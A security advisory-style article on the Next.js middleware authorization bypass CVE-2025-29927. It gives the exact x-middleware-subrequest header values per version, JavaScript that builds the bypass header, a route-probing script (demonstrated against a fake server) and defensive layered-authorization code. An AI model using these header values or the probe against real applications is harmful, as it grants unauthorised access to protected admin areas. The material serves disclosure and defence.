A newly disclosed critical security vulnerability in the Next.js framework, tracked as CVE-2025-29927, poses a serious threat to web applications by allowing attackers to completely bypass authorization checks implemented in middleware.
The flaw stems from improper handling of the x-middleware-subrequest header during Next.js middleware execution, potentially exposing administrative areas and other protected resources to unauthenticated access.
The vulnerability affects multiple versions of the popular React-based web framework, and the exact header value needed to exploit it depends on the version in use.
Key Takeaways
1. CVE-2025-29927 abuses the x-middleware-subrequest header to bypass Next.js middleware authorization.
2. Attackers set the header to the middleware's internal name so the runtime skips the checks.
3. The result is unauthorized access to protected routes, so authorization must be enforced in layers rather than in middleware alone.
Security researchers have demonstrated that an attacker can manipulate a single HTTP header to sidestep authentication and authorization controls and reach restricted areas without valid credentials.
Next.js Framework Vulnerability
NullSecurityX reports that the core of the vulnerability lies in Next.js's middleware processing logic, specifically in how it handles the x-middleware-subrequest header.
The header was designed to prevent infinite middleware loops by marking internal subrequests. Because the runtime trusted the header on incoming requests without distinguishing internal from external traffic, external requests can abuse the same mechanism.
The vulnerable pattern is simple: when a request carries the expected x-middleware-subrequest value, the runtime treats it as an internal subrequest and skips the middleware entirely, and with it every authorization check the middleware performs. The header value required varies across Next.js versions:
Versions before 12.2: attackers send x-middleware-subrequest: pages/_middleware to bypass middleware located in the pages directory.
Versions 12.2 and later: the header value changes to x-middleware-subrequest: middleware, matching a root-level middleware file named middleware.ts or middleware.js (src/middleware when the file lives under src/).
Versions 13.2.0 and later: a recursion-depth check was added, but the flaw persists, because an attacker can simply repeat the middleware name in the header, separated by colons, enough times to exceed the depth limit (for example middleware:middleware:middleware:middleware:middleware).
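The following is an added illustration, not Next.js source code and not taken from the original article: a simplified model of the middleware gate described above, together with the header value that defeats it in each version range. The version parsing, the route, and the depth limit of 5 for 13.2.0 and later are assumptions of this model.

```javascript
// Simplified model of the CVE-2025-29927 middleware skip (illustrative, not Next.js code).
const MAX_RECURSION_DEPTH = 5; // assumed depth limit used by the >= 13.2.0 check

// Internal name the runtime uses for the middleware, by version range.
function middlewareName(version) {
  const [major, minor] = version.split('.').map(Number);
  return major < 12 || (major === 12 && minor < 2) ? 'pages/_middleware' : 'middleware';
}

// Whether this version uses the recursion-depth check instead of a plain membership test.
function usesDepthCheck(version) {
  const [major, minor] = version.split('.').map(Number);
  return major > 13 || (major === 13 && minor >= 2);
}

// Vulnerable decision: is this request an "internal subrequest" that may skip middleware?
// The header is read straight from the request, so an external caller controls it.
function skipsMiddleware(version, headers) {
  const raw = headers['x-middleware-subrequest'];
  const subrequests = typeof raw === 'string' ? raw.split(':') : [];
  const name = middlewareName(version);
  if (!usesDepthCheck(version)) {
    return subrequests.includes(name);
  }
  const depth = subrequests.filter((s) => s === name).length;
  return depth >= MAX_RECURSION_DEPTH;
}

// Attacker side: the header value that triggers the skip for a given version.
function bypassHeaderValue(version) {
  const name = middlewareName(version);
  return usesDepthCheck(version) ? Array(MAX_RECURSION_DEPTH).fill(name).join(':') : name;
}

// Simulated protected route: middleware demands credentials unless it was skipped.
function handleAdminRequest(version, headers) {
  if (!skipsMiddleware(version, headers) && !headers['authorization']) {
    return { status: 401 };
  }
  return { status: 200, body: 'admin panel' };
}

// Constructed demonstration: an unauthenticated request succeeds once the header is right.
console.log(handleAdminRequest('14.2.24', {}).status); // 401
console.log(handleAdminRequest('14.2.24', { 'x-middleware-subrequest': bypassHeaderValue('14.2.24') }).status); // 200
```

Note that on 13.2.0 and later a single occurrence of the name is not enough; the model returns 401 for x-middleware-subrequest: middleware and only skips the check once the repeated value reaches the depth limit.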
Practical exploitation demonstrates the severity: a single, ordinary HTTP request for a protected administrative path with the header set is enough. Such a request bypasses the middleware protection and grants unauthorized access to admin functionality.
The vulnerability is particularly dangerous in applications whose JSON Web Token (JWT) or cookie-based authentication is validated only in middleware, since skipping the middleware skips token validation entirely.
Automated tooling can probe many protected routes in a single pass.
Risk Factors
Affected Products: Next.js versions before 12.2 (pages/_middleware); Next.js versions 12.2 and later (middleware)
Impact: Complete authorization bypass via middleware skip
Exploit Prerequisites: Ability to send HTTP requests with a custom x-middleware-subrequest header
CVSS 3.1 Score: 9.8 (Critical)
Security researchers have published proof-of-concept scripts that iterate through common administrative endpoints (/admin, /dashboard, /settings) while injecting the malicious header, quickly identifying vulnerable entry points across an entire application.
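As an added example of the probing described above (not a published proof of concept and not code from the original article), the routine below requests each route twice, once plainly and once with the crafted header, and flags only routes where the header turns a denial into a success. The fetch function is injected so the logic runs offline against the constructed fake server included here; the base URL, route list, fake server, and its depth limit of 5 are all assumptions of the example.

```javascript
// Differential probe for the x-middleware-subrequest bypass (added example).
async function probeProtectedRoutes(baseUrl, routes, headerValue, fetchImpl) {
  const bypassable = [];
  for (const route of routes) {
    const url = baseUrl + route;
    const baseline = await fetchImpl(url, { headers: {} });
    const probe = await fetchImpl(url, { headers: { 'x-middleware-subrequest': headerValue } });
    // A route that is public anyway (200 both times) is not evidence of the bypass;
    // only a denial or login redirect that becomes 200 with the header counts.
    if ([401, 403, 307].includes(baseline.status) && probe.status === 200) {
      bypassable.push({ route, baseline: baseline.status, withHeader: probe.status });
    }
  }
  return bypassable;
}

// Constructed fake of a vulnerable app with >= 13.2.0 behaviour (depth limit 5 assumed):
// /admin, /dashboard and /settings sit behind middleware that redirects to login,
// /api/health is public. It mimics the real fetch signature closely enough for the probe.
function fakeVulnerableServer(url, { headers }) {
  const path = new URL(url).pathname;
  const depth = (headers['x-middleware-subrequest'] || '')
    .split(':')
    .filter((s) => s === 'middleware').length;
  const middlewareSkipped = depth >= 5;
  const protectedPaths = ['/admin', '/dashboard', '/settings'];
  if (protectedPaths.includes(path) && !middlewareSkipped && !headers.cookie) {
    return Promise.resolve({ status: 307 }); // redirect to /login
  }
  return Promise.resolve({ status: 200 });
}

const BYPASS_HEADER = 'middleware:middleware:middleware:middleware:middleware';
const COMMON_ROUTES = ['/admin', '/dashboard', '/settings', '/api/health'];

// Constructed run against the fake; with a real deployment, pass globalThis.fetch instead.
probeProtectedRoutes('https://example.test', COMMON_ROUTES, BYPASS_HEADER, fakeVulnerableServer)
  .then((results) => console.log(results.map((r) => r.route))); // [ '/admin', '/dashboard', '/settings' ]
```

Checking the baseline status first matters in practice: an application that serves /dashboard to anonymous users is misconfigured in its own right, but it is not a finding for this CVE.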
The impact extends beyond a simple authorization bypass. In applications that rely solely on Next.js middleware for security controls, an attacker may be able to read sensitive user data, modify application configuration, or perform administrative actions without ever authenticating.
Organizations running Next.js applications should immediately review their middleware-based authorization and upgrade to a patched release (13.5.9, 14.2.25 or 15.2.3 and later).
The disclosure underscores the importance of defense in depth: authorization controls should exist at multiple layers of the application rather than depending solely on middleware.
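The following added example (not from the article or the Next.js project) shows what that layering looks like in practice. Layer 1 runs at the edge or reverse-proxy boundary and drops the internal-only header from any external request, the workaround the Next.js maintainers published for deployments that cannot patch immediately. Layer 2 is the route handler itself, which verifies the session on its own instead of trusting that middleware ran. The session store, cookie format, route and role names are constructed for this example, and the middlewareRan flag stands in for a skipped middleware on a vulnerable version.

```javascript
// Layered authorization so a skipped middleware is not a skipped check (added example).

// Constructed session store: in a real app this is your session backend or JWT verifier.
const SESSIONS = new Map([
  ['s3ss10n-alice', { user: 'alice', role: 'admin' }],
  ['s3ss10n-bob', { user: 'bob', role: 'viewer' }],
]);

// Layer 1: headers that only the framework should ever set never cross the edge.
// Equivalent to clearing x-middleware-subrequest at the reverse proxy.
const INTERNAL_ONLY_HEADERS = ['x-middleware-subrequest'];
function stripInternalHeaders(headers) {
  const clean = {};
  for (const [name, value] of Object.entries(headers)) {
    const key = name.toLowerCase();
    if (!INTERNAL_ONLY_HEADERS.includes(key)) clean[key] = value;
  }
  return clean;
}

// Resolve the session from the cookie header (constructed "session=<id>" format).
function sessionFromCookie(headers) {
  const match = /(?:^|;\s*)session=([^;]+)/.exec(headers.cookie || '');
  return match ? SESSIONS.get(match[1]) || null : null;
}

// Middleware layer: redirects anonymous users to login. On a vulnerable version this
// layer can be skipped, which the middlewareRan flag simulates.
function middleware(headers, middlewareRan) {
  if (!middlewareRan) return null;
  return sessionFromCookie(headers) ? null : { status: 307, location: '/login' };
}

// Layer 2: the handler re-authorizes on its own. It never assumes middleware ran,
// and it also enforces the role, which a login redirect alone never did.
function adminHandler(headers) {
  const session = sessionFromCookie(headers);
  if (!session) return { status: 401 };
  if (session.role !== 'admin') return { status: 403 };
  return { status: 200, body: `admin panel for ${session.user}` };
}

// Full request path: edge strip -> middleware (possibly skipped) -> handler.
function serveAdmin(rawHeaders, { middlewareRan = true } = {}) {
  const headers = stripInternalHeaders(rawHeaders);
  const denied = middleware(headers, middlewareRan);
  return denied || adminHandler(headers);
}

// Constructed demonstration: the bypass header plus a skipped middleware still ends in 401.
console.log(serveAdmin({ 'X-Middleware-Subrequest': 'middleware' }, { middlewareRan: false }).status); // 401
console.log(serveAdmin({ cookie: 'session=s3ss10n-alice' }).status); // 200
```

The handler-level check is the one that actually holds when the framework layer fails; the header stripping is cheap and removes the attack surface for this specific bug, but it is the second, independent check that makes the design robust against the next middleware bypass.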